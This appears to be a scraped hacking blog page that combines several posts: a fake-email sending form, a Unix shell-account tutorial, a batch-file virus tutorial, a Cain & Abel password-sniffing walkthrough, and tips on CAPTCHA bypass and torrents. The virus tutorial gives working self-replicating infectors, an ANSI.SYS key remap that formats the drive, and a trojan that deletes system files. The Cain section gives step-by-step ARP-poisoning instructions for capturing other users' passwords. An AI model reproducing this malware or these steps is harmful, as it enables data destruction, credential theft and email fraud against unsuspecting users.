This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Send Fake Email

Send Fake Email

This tool allows our visitors to send emails to anyone, from anyone. This tool is intended for fun purpose only and cannot be used for spam or any such activities. With this send fake email tool, your email will not be considered as spam. Send Fake Email is one of the most advanced and the best tool online. Note this tool combines the power of PHP, ASP and some other languages.

By sending fake email, you may be committing the offense of fraud, which as we all know (right?) is an imprisonable offense. If this is being done as a prank, I would recommend that you let the person you are emailing know what you are doing, either ahead of time or IMMEDIATELY after you do this. I'm going to ask you to behave responsibly with this information. Sure, have a quick joke, but using this in a malicious way will get you in trouble!

Well other things apart below is the form, enter all the details and hit the send email button and your email will be sent to the person whome you intended to send.

div class="max">








Sender Email (from):

Reciever Email (to) :






Subject :





Body :







SHELL Basics

This is a tutorial explaining what a shell account is, how you can get one and some basic commands. If you are thinking that you can find here shell scripting or exploit hints, you are wrong. Wait for further tutorials. The first part is just a bunch of questions with answers. After that I'll do a quick view about shell flavours and where can you get shells for free. So here we go.


----------------------------------
The Questions That Everybody Asks
----------------------------------


Q:What is a shell account?

A:Ok...I think I won't be needing to explain what an account is, but let's talk about the shell. You probably are using Windows, so your shell is command.com and all that cute (crashing) Graphic environment. Being more precise a shell is the program that translates and sends your commands to your system's core. This happens because the core doesn't understand the commands you give. For example, when you type "cd ..", this command will be first translate to a low language level by the shell and just after that, sent to the core (or your CPU would drive mad). Do you imagine how painful would be using a computer if you hadn't a shell? You needed to use a low language level, like assembler or even worst (binary) to do something. If you wanted to do "cd .." you would have to write a bunch of push mem put mem blabla mem or a huge list of 00101010. Do you really think that this would work with people? I don't think so.
Ok..Ok.. There are many persons that code in assembler, but I'm talking about ordinary people.

Q:So you are saying that a shell is just a "thing" that translates my inputs to the core, like command.com. But why do I want to connect to a remote command.com, I've got my own in my box.

A: People like Shell Accounts because you don't connect to a Windows box, but to a *nix box. If you can't have linux or any other *nix System at home, you could get a Shell Account, and start playing with linux like if it was in your own box.



Q:My friend is a *nix guru and he told me that some shells suck because they are restricted what's that?

A:There are two kind of shells, the restricted shells and the non-restricted shells. The difference between both is that usually restricted shells aren't rented, they are free shells, but in those shells you can't execute every command you want (for example, using a free shell they can keep you out of dig, nslookup and telnet programs). On the otherhand using non-restricted shells, you can run any command you want but these kind of shells are paid (sometimes universities give non-restricted shells to the students). Hey, but even if you have a restricted shell don't be worried, some of them are really good.



Q: So you are saying that I can get a shell without paying for it?

A: Yes you can. For me the best place is at nether.net (other host that is a free shell provider is freeshell.org), I'll guide you through the all process later. Sometimes ISPs also give shell accounts to their users, so you may have already a shell account and you don't know, phone to yours ISP's Support and talk with them.



Q: I phoned my ISP asking for a shell account, and they asked why did I want one. What should I say?

A: Just tell that you really love to surf with Lynx, and that you want to learn Unix. That should do. If they hang up, just go for the free shells.



Q: Hey I've got a shell, but how can I know if it's a good shell?

A: I think the answer is relative, it depends from the person who answer, for me the things that make a good shell are listed below.

-> Telnet (terminal emulator)
-> Nslookup (Gives you information about the host)
-> FTP (File Transfer Protocol, do I need to say anything else?)
-> Finger (gets information about some user)
-> Traceroute (The same as tracerT.exe in Windows, but much better)
-> Dig (probably many of the restricted shells won't let you use, but don't
worry)
-> Netstat (like in windows, lists all sockets and their status)
-> GCC (c compiler, cool to do your own coding)
-> Gzip (to [un]pack stuff)
-> Lynx (Best Browser in the World)

This doesn't mean that a good shell for you needs to have this. For you a good shell could be just a shell that allows you to telnet, like I said it's very relative. But if your shell account doesn't let you use telnet, FTP and GCC, you should get other shell account.


By now you should be getting bored of reading stupid questions, and even more stupid answers, so let's get in another section. Let's talk a little about the flavours of Shell Accounts.


-------------------------------------------
Quick View about flavours of Shell Accounts
-------------------------------------------

There are may kinds of shell accounts, some of them are what we call home made shells, other are the "standard" shell. Let's talk about the "standard" shells.

--------------------------------- Just for your information -------------------------------------
Home made shells are shells that are made by the sysop that owns the system, and it's just running in his system.
-------------------------------------------------------------------------------------------------

Like I said there are plenty of shells.You've got:

-> shell: Bourne Shell
-> Bash : Bourne Again Shell
-> Cshell: C Shell
-> Tcsh: Technical C Shell
-> Ksh: Kourne Shell
And many others. (I just listed those because it's the ones you can get at nether.net)

Each shell has their strong and weak points. For example the Cshell allows you to type in C commands like if it were normal commands, that means that if you type printf Hello it will be the same as echo in other shells(for the ones who don't know C language, printf stands for printing in the screen the input given). I won't explain the strong and weak points in each shell, you should be the
one doing that. Just get them at free shell providers at start exploring. The only hint I'll give you is that Bash is the best shell for beginners, if you want a more powerful shell just go to the C shell. Start with bash, explore the system, learn some bash scripting, then start using other shells. Talk with your friends that have others shells, ask what they think about it, you're getting the idea, aren't you?Wink If you already have one shell and doesn't know which shell is it, just type in echo $shell and it will probably be shown your shell's type. Since this is a quick view, I'll end here. Gonna help you getting a real cool shell account.


-------------------------------------
Getting a Shell Account At Nether.net
-------------------------------------

So are you ready to get your first shell account? Of course you are. The only thing I don't like in nether.net is the offline time that the
server sometimes stays. So if you can connect to nether.net don't worry, since there are plenty of people in that host sometimes he overflows and goes offline. Just wait some hours and you probably can go online again.

------ Accessing nether.net ------

Step 1. (Getting your terminal emulator ready to roll)

Open your telnet program, you can find it in windows directory under the name telnet.exe


Step 2. (Connecting)

Now that you are probably looking to the Telnet Window, select the Connect menu, and in that menu select Remote System.
It will be shown another box asking you for the hostname, port and term type. Fill those fields with the information below.

Hostname: nether.net
Port: Telnet (or 23 it's the same)
Term Type: vt100 (it should be already in this value)

You wait a little and...

------ Getting the account ------

Step 3. (Logging in)

Now you should be looking at the nether.net banner. That says:

Kernel SunOS 5.6 Generic_105181-17 on a sun4d
Welcome to nether.net

New to the system? Login as newuser

login:

Now like they say use newuser as login. A program called newuser will start, helping you creating an account.


Step 4. (Customising Keys)

After a bunch of crap, the newuser program will ask you to Customise keys. It will be asked the delete key (^H) and the break key (^C). What is in brackets are the default if you want you can choose any other. The ^H stands for the delete key (the one that has the <- symbol on it), and the ^C stands for ctrl+c. Attention don't write ^H or ^C just press the keys, and that will be the output.


Step 5. (Selecting Terminal Type)

After you customise the keys you'll be asked to enter your terminal type, you can select ? and the program will print you all the terminals support by it, but you should select vt100 or just press enter. Pressing enter the program will assume that your terminal is a dumb terminal. There is no problem to select the dumb terminal because you can change it later.


Step 6. (Personal Data)

It will be asked things like your full name, phone number, birth date, sex, blablab, your getting the idea. If you want you can just put a . and press enter. You can also give fake information, I think that 98% of the users at nether.net did that. In the end of all the questions you'll be asked if you want to hide the information from other users. Just say yes or no, I suggest you to say yes.


Step 7. (Selecting Shell)

Now it will be shown a list with the legal shells, just select one, like I said before if you are new to shell accounts choose bash shell.


Step 8. (Selecting Login)

Just select your login, like always 8 chars is the max length.


Step 9. (Selecting Password)

Select a password, it will be asked two times to see if the password is correct. You can change the password later using the passwd command later.


Step 10. (Accepting Choices)

At this time you should be looking to something like:

full name: Full Name
loginid: your username password:
address:
your address if you gave any
telephone: your phone number if you gave any
other e-mail addresses:
your e-mail address if you gave any
occupation:
The same here
computers:
Same
birthdate: Some date sex: Also something here
interests:
Something
how (did you find out about us):
How do you find them
Privacy switch on/off
shell: your shell account terminal: your terminal type
erase '^H' kill '^U' interrupt '^C'

Type "help" for a list of things you can change.

Select thing to change or "done"?

Now if you agree with all the data just type done and press enter, or if you want to change something just type the you want to change field.


Step 11. (After You type Done)

Now the program is checking if there is already your username, you should be seeing a bunch of numbers scrolling, it's normal don't get scared... Now if your Login name already exists will be asked another, if there isn't the system will encrypt your password, and you'll stay for some time watching a bunch of numbers scrolling. After that....


Step 12. (Congratulations You have a shell account)

Yep you've got a shell account, now you should be again in the login sequence and your login name is already written just type in the password, press enter and have fun. Remember that you can have many shells has you want. So if you want you can login again with newuser but instead of choosing a bash shell choose a Cshell and all the others or a shell bash again...


------------
The commands
------------

Hi won't talk about of every command that exists in *nix systems, if I did that the file would become huge. If you want to a big amount of information about commands check the final notes section. The basic commands are listed below with their function.

Syntax: command [switches] -> description

man [command] -> display the manual entry about the [command] you gave.

cd [directory] -> like in DOS it changes your current directory, to go one directory up you also use .., if you want to return to your home directory just type cd without the [directory] parameter.

ls [-al] -> ls makes the same as dir in DOS, it lists every file in the directory, the -al is some of the switch you can use. Using this two switch the listing will be displayed with hidden files, file permission, group and owner. To know all the other switches man ls.

cat [file] -> it's the same as the command type in DOS, it displays the content of the [file] given.

logout -> Logs you out from your shell account.

who -> Shows who's online, with information about those users. There are programs that make you invisible to the who command, but that's another story, probably in another tutorial.


ps [-aux] -> ps shows every procedure that is running, something like ctrl+alt+del in windows (not to reboot, but to show what's running) but much more powerful since it isn't known how we can run a program without being display in ps. If you run ps with no switches it will just show your own processes, if you use the switch -aux it will list every process that is running in the machine.

joe [file] -> joe is a text editor, it edits or creates the [file] given. Sometimes the shell providers haven't joe but they should have vi or vim (another text editor).


This command should be enough for you to start. Also use man command in the commands that we talk to get a bigger and more detailed description about it. Good surfing!

-----------
Final Notes
-----------

Now what you need is a little of practice, and good books to get in touch with the commands. One of the best *nix books is UNIX IN A NUTSHELL. You can find it in the books section at BSRF WWW page (http://blacksun.box.sk). For me, this is the best book about the subject, and since it's free I strongly recommend you to get it. Another good thing is man. For example, if you want to get some information about telnet, and how to use it, you just type in:

man telnet

And it will be prompt the manual page about telnet. If you are using a shell in the freeshell server (freeshell.org) you can also use the command help without any options. This will call you a menu with the options you can call. And keep in mind that *nix is Case Sensitive so Man, man and MaN or .profile and .Profile isn't the same thing.

Simple - Batch - File - Viruses - Explained

Simple - Batch - File - Viruses - Explained!

by LINUX_PIR8



Part 1: Introduction





This document is written for lamerz in batch language. This explains the true basics of batch file programming. Even experienced programmers could probably learn a thing or to from this document. Now back in the good old days batch files were quite popular among virus writers because of the sheer simplicity of them. But people now days have been guided to Pascal, Delphi and C++. Those mentioned are very good and powerful programming languages but I don't know about you but I think they are boring and hard to cope with. Batch is the language for YOU! Simple to pick up and powerful at the same time. Now if you want to learn batch then keep reading other wise go back to watching Eastenders. Ok people you are the chosen ones.... Continue to the next part.







Part 2: Basic commands



Now there are loads of commands you should already know which are used in DOS. But if you dont know DOS I suggest you go get a book out from your local library and read your ass off because that is the only way to learn.



Commands listed below I hope you should already know: -



Command.com

Find.exe

Choice.com

Attrib.exe

Mem.exe

More.com

Sort.exe



Filz you should know about are: -



Autoexec.bat (especially this one would help)

Config.sys

Msdos.sys

Tmpdelis.bat

Dosstart.bat

win.ini

System.ini



Now filz such as these will help you in your understanding of batch language.



I will explain what each one does and how it can be used, are you ready...-



Command.com = the command interpreter, dos needs this to function!

Find.exe = can be used to search through almost anything for anything! (More on that later)

Choice.com = used for menu system functions e.g. a/b/c?

Attrib.exe = sets attributes on filz to make them read only or hidden

Mem.exe = Tells you about memory resources

More.com = More on this later :)

Sort.exe = Sorts data (not to sure on this one)

Autoexec.bat = start-up file processes functions and drivers needed

Config.sys = start-up file processes functions and drivers needed

Msdos.sys = same as above but go look in this one, it is interesting, go on play a little.

Tmpdelis.bat = is a windows batch file go look inside for more info...

Dosstart.bat = windows batch file used for dosprompt to load.

Win.ini/system.ini = windows initiation filz play with these and say good by to Winblows 95/98/NT



Heres some more details about some of the DOS commands:



FIND.EXE = This command is very powerful indeed. Yet to the everyday ignorant user this file means nothing! This file can search through files for specific words, through memory for specific files (tsr's) and through the bios for date, time day etc... This means i could if i wanted to see what the date is and if it is my specified date i could make my virus activate. You see where i am coming from now? It is a very powerful tool, for good and bad! In respect to the good side you could use this program to search through memory to find specific viruses such as the stoned and aircop virus, thus a virus detector!



CHOICE.COM = This file is not bad at all. It is for mainly menu systems in batch files, but can be used in other ways if the user wishes to. For instence this program can tell the difference between yes and no. It also has a delay sequence that you can activate, thus using it for timed viruses, e.g. Your Pc is going reset in 10 seconds.

This is a useful tool in viral programming, because you can get the user to activate the virus, by just pressing a key.



ANSI.SYS = This file is widley used in BFV's, it has unlimited use. Its main ability is that it can redirect keys to do commands, for example i could program the [a] key to format the hard drive. This is so powerful and dangerous, because it is so easy to do:



Prompt $e[97;"echo Y| format c:/u >nul";13p



Just that line could destroy the whole hard drive with out the user knowing. To use Ansi.sys it must be loaded into memory through config.sys file.



ATTRIB.EXE = This file is used in DOS for putting attributes on files making them read-only and/or hidden. Great concealment for bfv's.



Each command is some where along the line used in batch filz. But not all the time because they are not needed. For instance a simple batch file below, which asks the user to enter a password, needs no commands just pure batch language.



@Echo off

echo Enter password then [F6] and then smack the [Enter] key real hard!

prompt $e[30m

echo on

echo off

copy con password.dat>nul

prompt $e[0m

echo on

echo off

cls

copy password.set+password.dat password.bat>nul

call password.bat

if '%password%=='r3dhat goto done

echo Incorrect, you are not trying to break into my pc are you?

choice /t:y,3

if errorlevel 2 goto next

:next

erase password.bat

erase password.dat

:hello

cls

echo Turn off PC

goto hello

:done

erase password.dat

erase password.bat

set password=

prompt $p$g



Simple batch file, which asks the user for a password, and if they type it incorrect then the program will put them in an endless loop! Simple but effective. Other features; are that when typing the password the text colour is set to black so you cant see it then it resets the colour back to normal when finished. Erm...what else? Oh yeah it makes two files puts them together to make another batch file then runs it to set a variable into memory, then the password.bat file will look in memory to check what the user wrote to see if it is correct. Good thinking hey! Well experiment with this one can be interesting. Any bugs or improvements email me at linuxpir8@yahoo.com







Part 3: Viruses Explained



Now lets get one thing clear! A virus is not a program that gets on your hard drive by magic and then formats it.



A virus is a program, made to replicate/copy itself from one file to another. It can not infect files unless you RUN it! Most viruses come off disks or the NET and the user doesn't even realise until his MICROSOFT software decides it doesn't want to work anymore. (I THINK IT MIGHT BE BEST TO MENTION THAT I HATE MICROSOFT AND THE ONLY GOOD THING THAT HAS COME OF THEM IS MSDOS!)



Now despite my hatred towards Machosoft, i think that most viruses are aimed at Windows/x these days due to the mass numbers that use the O/S. But remember where there is Windows there is MSDOS!!! And where there is msdos there are batch filz and where there are batch filz there are my viruses.



A simple diagram: -



xxxxxxxxxxxxxx xxxxxxxxxxxxxx

x Mat156.bat x x mat156.bat x

xxxxxxxxxxxxxx xxxxxxxxxxxxxx

v virus v

vvvvvvvvvvvvvv

^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^

uninfected infected



That is the difference between the infected and the uninfected in batch filz.







Part 4: Simple Batch File Virus



Below I'm going to make up a virus then explain how it works. OK here goes....



Virus.bat



@echo off

ctty nul

for %%f in (*.bat) do copy %%f + virus.bat

ctty con



Thats it, simple infection routine that infects all batch filz in the current directory. This kind of infection is not popular among virus writers due to the way it infects. This virus will not only infect itself, but if it cant find anything to infect it will loop and re-infect all other batch filz all over again until all the memory or system resources are taken up. This is a bug but also a feature. It just appends itself on any batch file, lame but somewhat effective if used in the correct context. Try it out and play with it, as no real damage can occur. Mind you it is very quick, so if you leave it for ten seconds it probably will have infected other batch filz about 600 times. Batch file viruses are very fast. Im am now going to attempt to explain what each line does: -



@echo off - turns off the commands written in the program so the user cannot see what you are typing.

ctty nul - disables the keyboard and screen output, meaning you cant stop the virus unless you turn off your PC.

for %%f in (*.bat) do copy %%f + virus.bat - this puts the virus in all batch files in the current directory.

ctty con - re-enables the keyboard and the screen display.



Hope fully you understood all that and you are ready to go onto something more advanced.







Part 5: Advanced programming



OK here is the technical stuff. Variables! We set variables so that we can identify stuff. E.g.



set virus=*.bat



That command means that I can now say virus instead of *.bat. Meaning I can now say infect virus, instead of saying infect *.bat. May seem pointless but in the context that variables are used in it can be very powerful. Below is a virus that uses variables to infect: -



@ctty nul.LR

for %%a in (*.bat) do set LR=%%a

find "LR"<%LR% if errorlevel 1 find "LR<%0>>%LR%

ctty con.LR



This virus uses the variable LR to identify the batch file to infect. Now I will try to explain what this virus is doing in the simplest terms I can, ok you ready? Right this virus will disable the keyboard then search through all the batch filz until it reaches the last one, then it sets the variable LR to the last batch file found, ok so far so good. So now we have a variable assigned to a file. Then it searches through the file for the Key string (variable) LR and if it has it in there it wont infect it again but if it doesn't it will goto the next line. This is where the infection takes place. The virus finds the key string which you should have now guessed is LR which is on every line of the virus and then it finds the letters LR from %0 which is the current file normally the virus, and then gets all the lines with LR on them and inserts them into the file that the variable was assigned to earlier. Finally the virus then enable the keyboard for the user. Badly explained I know but try it out and put a few pause marks in the file and watch what it does! Suprisingly simple. This program is covered more clearly in my article about batch file viruses.







Part 6: Programs made in batch



I have not made that many programs in batch but use your imagination and you can. For example I earlier showed you the password file, I have also made a batch file virus remover, but what I haven't made is a virus detector. My friend at my college gave me the challenge to make a batch file that detects viruses or destructive commands so me and my big mouth took him up on the idea and came up with a lame program. Searches memory for popular memory resident viruses on a small scale, this could be enlarged to any number of viruses!



@echo off

echo [1] Stoned virus

echo [2] Aircop virus

choice /c:12

if errorlevel 2 goto aircop

:stoned

mem /c|find /i "stoned!" >nul

if errorlevel 1 goto no_virus

:virus

echo Sorry to inform you but you are infected with the stoned virus!

goto done

:no_virus

echo Congratulations man you are clean

:aircop

mem /c|find /i "Aircop" >nul

if error level 1 goto no_virus2

:virus

echo You have the Aircop virus.....Unlucky!

goto done

:no_virus2

echo You lucky son of a bitch no virus found!

:done



Very lame technique but if used on a larger scale it works really well and it tells you how much system resources the virus has taken up as well!



Alrighty then on to the real challenge, searching for destructive commands within BAT, COM, and EXE files. I did not make this program!! But phuck me it works!



@echo off

if '%2=='Loop goto loop

echo *** ANSI/BATCH SCANNER ***

set mask=%1 %2 %3 %4 %5 %6 %7 %8 %9

if '%mask%==' set mask=*.*

for %%f in (%mask%) do call %0 %%f Loop

goto done

:loop

if not exist %1 goto done

set line=

:: escape and tab characters

set esc=

set tab=

find "%esc%["<%1>nul

if not errorlevel 1 set line=%line%EscSeq

find /i "$e["<%1>nul

if not errorlevel 1 set line=%line%PromptSeq

find ";13p"<%1>nul

if not errorlevel 1 set line=%line%KeyRedef

if '%line%==' goto checkbad

find """p"<%1>nul

if not errorlevel 1 set line=%line%Key2

set hit=0

find "0p"<%1>nul

if not errorlevel 1 set hit=1

find "1p"<%1>nul

if not errorlevel 1 set hit=1

find "2p"<%1>nul

if not errorlevel 1 set hit=1

find "4p"<%1>nul

if not errorlevel 1 set hit=1

find "5p"<%1>nul

if not errorlevel 1 set hit=1

find "6p"<%1>nul

if not errorlevel 1 set hit=1

find "7p"<%1>nul

if not errorlevel 1 set hit=1

find "8p"<%1>nul

if not errorlevel 1 set hit=1

find "9p"<%1>nul

if not errorlevel 1 set hit=1

if %hit%==1 set line=%line%Key3

:checkbad

find /i "DEL "<%1>nul

if not errorlevel 1 set line=%line%Del

find /i "DELTREE"<%1>nul

if not errorlevel 1 set line=%line%Deltree

find /i "DEBUG"<%1>nul

if not errorlevel 1 set line=%line%Debug

find /i "ATTRIB "<%1>nul

if not errorlevel 1 set line=%line%Attrib

find /i "FORMAT C:"<%1>nul

if not errorlevel 1 set line=%line%Format

find /i "*.BAT"<%1>nul

if not errorlevel 1 set line=%line%BAT

find /i "*.EXE"<%1>nul

if not errorlevel 1 set line=%line%EXE

find /i "*.COM"<%1>nul

if not errorlevel 1 set line=%line%COM

echo %1 %tab%%line%

:done

set mask=

set line=

set hit=

set esc=

set tab=







Part 7: Viral writing groups



There are plenty of virus writing groups around but they all seem to be in it for fame? People that inspired me where Dark Avenger - who could program any batch file to do any thing!! Hellraiser - who hates Bill gates, but at the same time has some really good ideas, and Lucifer Messiha - who really put the v into virus. These guys dont write anymore but if they did then the viral comunity would be bowing down to them. Viral writing groups are to competetive, they are good at what they do but seem to be complete idiotic adolescents. The time i joined a writing group i thought, oh yeah im good but the reality of it was that i was not writing viruses for fun but i was writing viruses to compete. If you get to the stage that you can program a virus and you want to join a viral group then just remember the fun side of it, do it for yourself. I dont know if you've every heard of Rock Steady, but he wrote loads of viruses (destructive ones) and gave them to John mcaffee pretending he was a victim of this virus. This would then get the virus noticed and the anti virus program makes his virus well known, but at the same time it can be cured. Whta i mean is once you send in a virus the next anti-virus John brings out with have info on Rock Steadys virus. Is it worth it? He is a glory creator! By the way he turns out to be only 15 years old!!! Thats pritty much it on virus writing groups, lets now move on and go to ethics and moral matters concerning viruses.







Part 8: Ethics & morality



OK here is why i am always screwing at people about destructive viruses and trojans. Imagine yourself saving up a whole load of cash, and then buying a new software package. But to your dismay some little **** puts a destructive program on the package and it wipes your whole disk!!! Now if your hard drive contained the amount of valuable data that mine does, i tell ya you'll be pissed! imagine a whole years work from college on it being deleted! See my point. Most people that do make these programs are beginners trying to show off there power, more often than not they are lamerz! Any one can make a program to del all files (erase *), simple stuff. Now the only time destruction pops into my mind is if i get expelled from college or sacked from work i might be tempted to leave a logic bomb on a pc that went off on my bosses birthday or something. But never for nothing, its just not worth it. Alright thats enough of me blabbing on read the rest of this document and enjoy!







Part 9: Trojan story and programming Trojans



It all started off years ago, when two tribes went to war, one tribe lost. This tribe how ever never gave up, they sent a big wooden horse (trojan horse) as a token of there defeat, so when the winning tribe opened there gates and took in the horse the lost tribe jumped out from a secret hatch in the horse and defeated the tribe, thus winning in the end. They only won from concealment.



Now trojans are destructive programs that are made to look like they do good. Now programming trojans is easy but fooling the user takes the mind of a genius. This is how i would do it. I would make a trojan called setup.bat then i would make ten text filz and rename tham all to .DAT filz and pretend the package is a game. Once they run the setup.bat....BOOM trojan loaded and say goodbye. Programming trojans is easy, but getting caught is even easier. You have to make a trojan that can not only destroy filz but also destroy all traces of itself. Here is my program of how i would do it.

@echo off cd\ if exist c:\windows goto winslows if exist c:\dos goto do$ :poof erase * goto end_trojan :winblows cd\windows if exist system.ini del system.ini if exist win.ini erase win.ini ren *.exe *.vxe ren *.dat *.cat ren *.sys *.sex goto end_trojan :do$ cd\dos ren *.com *.kom ren *.exe *.com ren *.kom *.exe if exist c:\command.com erase c:\command.com :end_trojan erase trojan.bat



Extreme basics, but i tell you this would mess up your Windows system for good and Dos would have to be re-installed. Trojans are easy though, so stick to viruses and have PHUN! :)







Part 10: Endless loops for fun?



This bit is lame but what the hey this document is aimed at the lame.(no offence). Here are some simple programs which just loop:-



:loop

dir /s

goto loop



The above displays all the filz on the hard drive and dont stop!



:loop

echo Hello world my name is loopy loo!

goto loop



This one will make the text scroll down the page



@echo off

:poo

cls

echo Loopy loo needs a poo!

pause bell^G^G^G

goto poo



That one beeps in the pc and displays the text.



ok that should be enough. Read the last bit and then goto bed!







Part 11: BFV removal



These batch viruses work by adding code to the beginning and/or the end of the infected BAT files. The extra code can be removed by loading the infected batch into EDIT and deleting the additional lines. Some will create a hidden copy of themselves in the root (or other directory), use ATTRIB filename -s -r -h followed by DEL filename, filename being the actual name of the virus file. The command DIR /AH /S will show all hidden files on a drive.



Here is the code for a batch file virus remover:



@echo off

if '%1=='%temp% goto remove

echo BFV-remover version 1.0

echo =======================

echo ÿ

:start

echo ************** Batch File Virus Remover ****************

echo This will remove any batch file virus if used correctly.

echo BFV-remover will destroy batch files if they do not have

echo a virus!!! So please read the instructions first.

echo Made by l33 Rumbl3

echo ÿ

set ks=%1

set is=%2

if '%ks%==' goto exit

if '%is%==' set is=%ks%

if '%temp%==' set temp=C:\

echo Will remove %ks% from files containing %is%. Proceed?

choice /c:yn>nul

if errorlevel 2 goto exit

for %%v in (*.bat) do call %0 %temp% %%v

if exist rem$$_ del rem$$_

goto exit

:remove

find "%is%"<%2>nul

if errorlevel 1 goto done

echo Found in %2 - remove?

choice /c:yn>nul

if errorlevel 2 goto done

find /v "%ks%">%2>rem$$_

copy rem$$_ %2>nul

goto done

:exit

set is=

set ks=

:done



This program removes viruses that have a unique key, such as the pot virus and the zep virus, although both these viruses do no harm they still are a threat to your data. The major advantage about this program is that it will abstract the virus from the file so that you do not have to delete the file.



This is for batch file viruses only!! It does not work on COM or EXE files!!



Warning! If key is not unique this will destroy files!



Usage:



CLEANBAT Key1 [Key2]



...where Key1 is the UNIQUE signature used by the virus and Key2 is an identifying string. If not specified then Key2 is set to Key1



eg. to kill the skul virus goto DOS and:



type: clean skul



..and that is it, easy, look in your batch files and see if you have any thing out of the ordinary such as the words infect/vir/a certain date.

Sniffing with CAIN

Sniifing with Cain and Abel

What is Cain & Able ?
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. (taken from their website)

Download Link :- http://oxid.netsons.org/download/ca_setup.exe (sometimes the link doesn't work)

Softpedia link :- > here <

This tutorial is meant for sniffing only there are a lot other things you can do with cain as mentioned above

How to sniff with CAIN
Step 1:- Install Cain and Launch it

Step 2:- Click on Sniffer tab


Step 3:- Activate the sniffer by clicking 2nd icon (seems like micro chip -- tooltip says Start/Stop Sniffer) from the left on top bar

Step 4:- Click on blue coloured Plus icon to scan for MAC address on LAN or simply right click ->scan MAC address


Step 5:- Click OK on the next window that comes -> CAIN is told to scan all the host in our subnet


Step 6:- Click on APR tab at the bottom


Step 7: Now Click on the Plus sign again at the top to add Computers to sniff on . A windows will pop up . In that windows . Select the router/gateway of your lan on the left side and the computer you want to sniff on the right side. Mostly the gateway is the one with ending octet 1 eg. 10.10.10.1 or 10.129.71.1 as in my case. Ususally last no. is 1




Step 8:- Now you'll see the computers are added to the list. Click on 3rd icon from the left on the top which is like has a biohazard sign . You'll see something like this



Step 9:- Step back and relax and let cain do its work you'll see passwords rolling in passwords tab.(click it to enter password)

well its 3 in the morning and i don't think anyone else is online besides me so this picture does't show you any passwords


Suggestions and Feedbacks are appreciated

Some Serious Hacking Tools Around for begginers

Here are some pics of some simple and basic hacking tools used by some Novice and just starting out "crackers" out there.There is no need for unix,linux stuff & other computing thing to use it.just have the tools & there u goes. These thing should not be out there but "meron kasing makukulit na "want to see other info not their own. These are backdoor program (trojan spy gen) and some hacking stuffs..used for stealing your passwords -"password lang naman ng..ie..yahoo id nyo" using the the 3rd of the possible way list below..
  • NetBIOS
  • ICMP Ping
  • FTP
  • rpc.statd
  • HTTP











there is more out there..laging i improve ur comp security and screen your sources olways specially in ur email..
We must always remember "Hacking is stealing and stealing is a Crime".

Tools to Automate RapidShare Downloading for Free Users With No CAPTCHA

RapidShare CAPTCHA has always been hacked no matter how tough they made it. Usually whenever RapidShare updates their CAPTCHA, it only took a few days for third party download tools to auto recognize it. One of the toughest CAPTCHA was with cats and dogs in them and it took 3-4 weeks to be cracked. A few days after the cats and dogs CAPTCHA has been cracked, RapidShare installed a new CAPTCHA system called TEABAG_3D.




The TEABAG_3D is developed by OCR Research Team and they are a bunch of CAPTCHA hackers too. They claim that after defeating several CAPTCHAs, they decided to make a CAPTCHA which is hard to break. I’ve been in communication with the developers of CryptLoad and jDownloader to keep track of the progress in defeating the latest 3D CAPTCHA in RapidShare. They were in 50% progress and suddenly RapidShare decided to eliminate the captchas to simplify the use of RapidShare’s free services significantly but with a catch that the download speed limit has been limited to 500kilobits per second, that is only 62.5KBps.

1. CryptLoad

- The interface is in English and configurations is not complicated. Other than downloading from RapidShare, it can also support downloading from many other One-Click hoster such as megaupload, gigasize, depositfiles and etc. Currently CryptLoad can only run on Windows with Microsoft .NET Framework and the next major update version 2 should support Mac OS and Linux as well. Supports automatic updates.
[ Download CryptLoad ]

2. JDownloader
- This tool has not been mentioned here before but I now tell you that this is a really good downloading tool for one-click-hosters website. JDownloader is open source, platform independent and written completely in Java. It simplifies downloading files from One-Click-Hosters like Rapidshare.com or Megaupload.com - not only for users with a premium account but also for users who don’t pay. It offers downloading in multiple parallel streams, captcha recognition, automatically file extraction and much more. Of course, JDownloader is absolutely free of charge. Additionally, many “link encryption” sites are supported - so you just paste the “encrypted” links and JD does the rest. Because it is written in Java, you can run JDownloader on Windows, Mac OS and Linux. Support automatic updates. Try it and you’ll love it!

[ Download jDownloader ]

3. CandiSoft Load!
- Load! also has not been mentioned at this blog before. The interface is in German but it shouldn’t be too hard to understand as some words are pretty similar to English. You can always make use of Google Translate to help you translate from German to English. Runs on Windows and supports automatic updates. It also supports other one-click-hosters such as megaupload, netload.in, uploaded.to and etc.
[ Download CandiSoft Load! ]


4. RS Downloader
- This tool has been mentioned at this blog before and the interface is in German. It runs on Windows, supports automatic updates and can only download from RapidShare. Can also automatic decrypt and recognized encrypted rapidshare links using YouCrypt plugin.
[ Download RS Downloader ]

5. Universal Share Downloader (USDownloader)
- USDownloader is another popular and powerful one-click-hoster download manager. It supports a lot of free hosting services, including the most popular ones like RapidShare, MegaUpload or YouSendIt. You can select up to 26 types of languages for the program’s interface and it runs on Windows. When want to do an update on USDownloader, you’ll have to use the server http://usd.cap-cap.ru/ because the one in the list doesn’t work.
Download USDownloader ]

source: raymond.cc

Speed up your torrents

1. Cap your upload (most important)

Limit your upload speed to approximately 80 percent of your maximum upload rate. You can check your upload speed over here (never trust your isp). Once you know your maximum upload speed, change the max upload (to 80%) speed in your torrent client’s preferences.

Don’t get me wrong, everyone should share as much as possible, but if your upload rate reached it’s max, your download rate suffers significantly.

2. Hack the max TCP connections

If you’re on XP sp2, your TCP connections are limited to a maximum of 10. This seriously hurts your downloading speed because it wont let you connect to a high amount of ip numbers. It is supposed to slow down viruses because their spreading strategy is to connect to a high amount of ip numbers, but it also cripples your torrent downloads.
A nice way to fix this is to download this patch, it allows you to set the maximum allowed connections to any number you want. Any number between 50 and 100 is ok (more on this).

3. Check seeds and peers

A simple tip, but o so important. Always look for torrents with the best seed/peer ratio. The more seeds (compared to peers) the better (in general). So 50 seeds and 50 peers is better than 500 seeds and 1000 peers. So, be selective.

